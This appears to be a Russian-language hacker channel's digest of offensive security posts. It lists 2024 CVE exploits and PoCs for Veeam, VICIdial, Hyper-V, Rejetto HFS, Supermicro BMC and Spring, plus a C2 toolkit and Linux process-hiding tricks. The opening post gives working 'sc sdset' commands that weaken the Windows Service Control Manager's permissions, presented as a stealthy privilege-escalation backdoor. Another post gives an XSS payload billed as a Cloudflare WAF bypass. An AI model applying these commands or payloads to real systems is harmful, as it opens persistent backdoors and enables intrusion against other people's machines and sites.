Легальный и малозаметный LPE backdoor в WiNd0z
*
Разрешаем удаленное использование Services.msc

sc sdset SCMANAGER D:(A;;CCLCRPRC;;;AU)(A;;CCLCRPWPRC;;;SY)(A;;KA;;;BA)S:(AU;FA;KA;;;WD)(AU;OIIOFA;GA;;;WD)

sc.exe sdset scmanager D:(A;;KA;;;WD)

#win #backdoor

LoL )))
reCAPTCHA Phish

BEAR-C2
*
Мишка - это компиляция скриптов C2, полезных данных и стейджеров, используемых в симулированных (?) атаках российскими группами APT.

DownLoad

#мишка #C2

CVE-2024-8504 и CVE-2024-8503
*
SQLi and RCE - VICIdial
*
Exploit

CVE-2024-40711 Exploit Veeam backup and Replication
*
WriteUp
*
Pre-Auth exploit

#veeam #rce

А Вы читали библию сегодня ?
*
Malcore Malware Bible

#malware

CVE-2024-38080 Hyper-V 1-Day
*
WriteUp
*
POC exploit

#hyper-v

CVE-2024-23692 RCE
*
Rejetto HTTP File Server
*
exploit

Умели раньше в сплоиты !
*
CVE-1999-1587 - Solaris 8, 9
*

Побег из KVM
*
writeUP - trojan-turtles
*
exploit

Хакер хакера поневоле брат
*
Уязвимости в популярных\opensource СС\С2 фреймворках
*

Скрытие (и раскрытие) процессов Linux
*
*
1. Hiding Linux Processes with Bind Mounts
*
2. The 'Invisibility Cloak' - Slash-Proc Magic

#linux #hacks

CVE-2024-45519
*
SMTP exploit

LOLESXi
*
Living Off The Land ESXi

CVE-2024-26808
*
Local Privilege Escalation Risk in Linux
*
WriteUp
*
Exploit

#linux #lpe

Ретро из 2000 года !
*
Можно заDOSить Win95, Win98, Win98sr2, WinNT4
*
Link

#cool #blablaAbout

CLOUDFLARE BYPASS

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

CVE-2024-36435
*
RCE Flaw in Supermicro BMC IPMI Firmware
*
WriteUp
*
POC exploit

#servers #ipmi #rce

CVE-2024-38816 Spring Framework
*
exploit